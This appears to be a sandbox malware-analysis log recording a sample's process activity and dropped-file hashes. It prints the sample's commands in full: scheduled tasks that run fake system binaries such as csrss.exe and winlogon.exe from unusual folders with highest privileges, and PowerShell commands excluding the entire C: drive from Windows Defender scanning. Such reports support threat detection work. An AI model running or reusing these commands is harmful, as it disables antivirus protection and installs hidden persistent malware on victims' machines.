schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Defender\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\sysmon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Windows\es-ES\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\es-ES\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Windows\es-ES\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Windows\ShellExperiences\taskhostw.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellExperiences\taskhostw.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Common Files\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b144" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\PrintHood\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Admin\PrintHood\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\PrintHood\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\fonts\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Mozilla Firefox\fonts\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Users\Default\PrintHood\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\Default\PrintHood\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe'" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\JXArPKtZVz.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8871802c-fbd3-4866-bb96-e8b1f0eab784.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ac7ffc9f-ba9e-46d6-ba56-7f58f6154415.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a74c8e64-e0a5-4767-8876-06c54256768b.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\157a85d1-e1c5-4d60-acd0-6376f75ccfe6.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f3744082-178f-4fb8-8305-22168e592630.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\468810d4-d71b-4ae5-b835-19897f8d6c88.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\936c0347-2527-44eb-9d63-5c54e41e7c93.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\950f041f-2a11-49b4-a769-b8787cb9028e.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a2523950-b7fd-45b5-a3d3-d892462873ff.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e65594d1-2841-4153-942b-9b5d307fbc07.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\78279cce-0834-4ce7-884f-51025e906453.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1a836feb-e577-49af-8e4b-1495fed3ad27.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f07b0632-e0a0-4834-9cc5-fb3ee37eef0f.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\54bd38af-87c5-48fe-9d3b-dda23650be95.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57a8059c-0609-4bf9-8e06-ecd002fac0a0.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94d97f6f-5eed-4094-a38a-b80224b700f3.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ac0d7cc6-d480-4647-8c53-892151473a8e.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e1a7b70-2c2d-4255-a4e6-67c6ef6f18cf.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ccf5517-81b1-45e4-877e-0f87c4f67da6.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\82144091-2f8b-4bde-84b2-38e96b9e9961.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f8445539-b919-4c4a-a633-eb3f19759892.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\07de029b-7705-47cc-9000-f15ad18e9a66.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\25db516b-c1d6-4ef1-992a-e30ca6f3def4.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b4d9ade-0a14-4bd3-91ff-60e9432ac03f.vbs"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c16ad20b-fb7f-48ba-8ccc-75b2241ec03e.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\95274962-9825-49cc-bb2f-8943f1a83ccb.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe"

Network


Files


C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd5940f08d0be56e65e5f2aaf47c538e
SHA1 d7e31b87866e5e383ab5499da64aba50f03e8443
SHA256 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512 c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5f0ddc7f3691c81ee14d17b419ba220d
SHA1 f0ef5fde8bab9d17c0b47137e014c91be888ee53
SHA256 a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5
SHA512 2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 32eb22918ace6c7c852e6547fee66953
SHA1 8608868448f9c6f0a42d06a8f833b5598236f159
SHA256 a1d8638e84347a9b06b2f3ad194e72eef4783d24d26feccb7a8e46b1d907eace
SHA512 9bb067f85829cdde4287e55dd1d1ba1645d59811560594a430e47166d907e30c4680bd7af1e380ca41240c4d4370ed371494f2151b6a8523ebe5bc7dabba6bb3

C:\Users\Admin\AppData\Local\Temp\8871802c-fbd3-4866-bb96-e8b1f0eab784.vbs

MD5 160e8cfd01eb375fedf778bf7fe36ad9
SHA1 f52eb95b56126347645689b5d0a5db0dbdcce3be
SHA256 b290b72a58ae66a4d2d1c7118eb80ff2935412930a7904b069b62b04878e8a15
SHA512 6fa51840070154ef9ad5862f967c877c12a2f96945277ef7bc1895ac74e7473285d9469d2a66aca4ea767332ab7d8b3457eed21dc21bd60f9f3c15a35829db3b

C:\Users\Admin\AppData\Local\Temp\ac7ffc9f-ba9e-46d6-ba56-7f58f6154415.vbs

MD5 c465cb464ca9b5b4748df804cd4b0f56
SHA1 f81a8b9d7a4d3f4c67f2ea3894157549c3277887
SHA256 2070e1e8634721a03f31632c87202e918c56e7b50c6a2489ae8182a35f4aea43
SHA512 99b2ec07e3a08ead1d451047a93108f8e08e459d74cd71eeda561635fcb2cfc38a7d0039c12f5be61fb0d83fb429aa3640405569c00e47b98c00e86bcb5241c1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Registry.exe.log

MD5 4a667f150a4d1d02f53a9f24d89d53d1
SHA1 306e125c9edce66f28fdb63e6c4ca5c9ad6e8c97
SHA256 414659decfd237dde09625a49811e03b5b30ee06ee2ee97ea8bcfac394d281fd
SHA512 4edd8e73ce03488a6d92750a782cd4042fbb54a5b3f8d8ba3ea227fda0653c2cd84f0c5d64976c7cdc1f518a2fdc8ff10e2a015ec7acf3cd01b0d62bc98542d8

C:\Users\Admin\AppData\Local\Temp\a74c8e64-e0a5-4767-8876-06c54256768b.vbs

MD5 fe4ead7e6f04b16baf861dc7642ad473
SHA1 377bd237b10ea45c8272ee586efaf8d86b40b9ce
SHA256 5c3304908d80579cde9ebd25304a50d5aed2b333e3651e19672a63018ab6bf0e
SHA512 cc4bdde415c3b1499a29741b042e0a8638c39bd3489c67f1a3fb14220efef28711d426a850bd4f7c5d5ef70c867f68bf6716c4291848147cd1f5060f204be4df

memory/3412-370-0x000000001C120000-0x000000001C132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f3744082-178f-4fb8-8305-22168e592630.vbs

MD5 54314c7c2ef931597b90c8769808607c
SHA1 59277f640a25786db49855ebde8536334d7f7f67
SHA256 b17b1024a3a173a6bbc752890a4f8a86130800a52d6608486db380c548f38026
SHA512 519da3c9f17a8dfebcf9b52b78c12bf76ee9163fe11d12e21ff93e445e160eb831341a626c79ad38f5e03400a42c946e0594c4e860645ef6c1e8e3a8abd96bcf

C:\Users\Admin\AppData\Local\Temp\936c0347-2527-44eb-9d63-5c54e41e7c93.vbs

MD5 e8b559e44fd88e51d45235127ed95369
SHA1 d3757953ad940f4cd8117de1a4144f435c88ba7c
SHA256 5cc56c54fa8177a1d02f4022fde17aa8c054589fe4c72fe340a2564b99ee3155
SHA512 60ce853dbf9549409e51d3b4d83bacaf019e96b64b99329b3d2df9bbac3740507e608b7297e41fdd173aed25450d86e98966457d3a59ddee744326a6048569e0

C:\Users\Admin\AppData\Local\Temp\a2523950-b7fd-45b5-a3d3-d892462873ff.vbs

MD5 ff17d74c85c02be7fac1bda91466afb2
SHA1 1c564beb9744181cd1604576158f7e617ba56fdc
SHA256 38d534f008aee802c7cf0e3b2b93bd01ce72b77ea0ecc6991db84277809af416
SHA512 131d36520de7bc96efe2fcdd523c64f5e783b240df3c5605d9b6f4db20fb191cdf36f50338a32b0ba36756b32d7e203356cb203f577f4b3e5a5e2ec64239d13f

C:\Users\Admin\AppData\Local\Temp\78279cce-0834-4ce7-884f-51025e906453.vbs

MD5 a9d872b14aa58e7bc7ab52f15b0d7aed
SHA1 0d897f30f5a74a9f594db56d1e1829223eac1b82
SHA256 242129e9d01d2a3520cb60cce88d57e92fc175dd567b50c8616d43a191d3b25f
SHA512 86cec81e0783d2fa003e92b3fb7382d7849d129a3bced5140f8e96f31284f031a4eb3da22bc2121dd091806394e03626bf31144bde3fa2c129ef178c984a8ebb

C:\Users\Admin\AppData\Local\Temp\f07b0632-e0a0-4834-9cc5-fb3ee37eef0f.vbs

MD5 3aa6b96a617f70e937f9cb8d6724ce3b
SHA1 f38c53060e2bd1f348e346d9bc90318d938e6cd4
